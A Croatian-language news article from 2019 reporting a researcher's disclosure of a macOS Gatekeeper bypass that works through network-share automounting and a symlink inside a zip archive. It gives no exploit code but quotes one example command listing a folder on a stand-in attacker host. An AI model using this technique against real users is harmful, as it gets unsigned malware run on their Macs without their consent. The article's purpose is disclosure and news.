Lako je instalirati zlonamjernu aplikaciju na Mac. Apple ni nakon tri mjeseca nije ispravio grešku

27. 5. 2019

Sigurnosni istraživač Filippo Cavallarin objavio je upozorenje o bugu u macOS 10.14.5 na svom blogu. To se sastoji u mogućnosti potpunog zaobilaženja Gatekeeperovih sigurnosnih mjera. Prema riječima Cavallarina, on je Appleu na pogrešku ukazao još u veljači ove godine, no kompanija je nije popravila u najnovijem ažuriranju.

Gatekeeper je razvio Apple i prvi put ga ugradio u svoj desktop operativni sustav 2012. To je mehanizam koji sprječava pokretanje aplikacije bez znanja i pristanka korisnika. Nakon što preuzmete aplikaciju, Gatekeeper automatski provjerava njen kod da vidi je li softver ispravno potpisan od strane Applea.

U svom postu na blogu Cavallarin navodi da Gatekeeper prema zadanim postavkama smatra i vanjsku pohranu i mrežna dijeljenja sigurnim lokacijama. Svaka aplikacija koja se nalazi u tim ciljevima stoga se može automatski pokrenuti bez prolaska kroz Gatekeeper provjeru. To je značajka koja se može iskoristiti za pokretanje zlonamjernog softvera bez znanja korisnika.

Jedan aspekt koji dopušta neovlašteni pristup je značajka automatskog montiranja, koja korisnicima omogućuje automatsko montiranje mrežnog dijeljenja jednostavnim navođenjem staze koja počinje s "/net/". Kao primjer, Cavallarin navodi stazu "ls /net/evil-attacker.com/sharedfolder/" koja može uzrokovati da operativni sustav učita sadržaj mape "sharefolder" na udaljenoj lokaciji koja može biti potencijalno zlonamjerna.

Kako prijetnja djeluje možete pogledati u videu:

Drugi čimbenik je činjenica da ako se dijeli zip arhiva koja sadrži određenu simboličku vezu koja vodi do funkcije automatskog montiranja, Gatekeeper je neće provjeriti. Na taj način žrtva može jednostavno preuzeti zlonamjernu arhivu i raspakirati je, dopuštajući napadaču pokretanje gotovo bilo kojeg softvera na Macu bez znanja korisnika. Finder, koji prema zadanim postavkama skriva određena proširenja, također ima svoj udio u ovoj ranjivosti.

Cavallarin na svom blogu navodi kako je Apple 22. veljače ove godine skrenuo pozornost na ranjivost operativnog sustava macOS. No sredinom svibnja Apple je prekinuo komunikaciju s Cavallarinom pa je Cavallarin odlučio cijelu stvar objaviti.

Izvor: FCVL

Teme: skladištenje, automatski, MacOS, video, postavke, funkcija, korisnik, aplikace, jabuka

Rasprava o članku

Vaše ime

Tvoj komentar

Ispunjavanjem gornjih podataka potvrđujem da je tvrtka TEXT FACTORY s.r.o., sjedište u Brnu, Durďákova 336/29, Černá Pole, poštanski broj: 613 00, ID broj: 06157831, registrirano kod Regionalnog suda u Brnu, odjel C. , umetak 100399, obrađivati će moje osobne podatke navedene u obrascu za registraciju koji sam ispunio na temelju legitimnih interesa TEXT FACTORY s.r.o. prema članku 6. stavku 1. f) GDPR i ispunjavanje zakonskih obveza (članak 6. stavak 1. točka c) GDPR), u sljedeće svrhe: nužnost da se osigura autorizacija posjetitelja web stranica kojima upravlja TEXT FACTORY s.r.o. da aktivno doprinose objavljenim člancima ili unutar rasprave forumima i ostvarivanje prava TEXT FACTORY s.r.o. kao administratora ovih foruma za raspravu. Više informacija o obradi osobnih podataka i pravima možete pronaći u Lekcije o zaštiti osobnih podataka. cijeli tekst

To bi mogao biti zanimati te

Povezano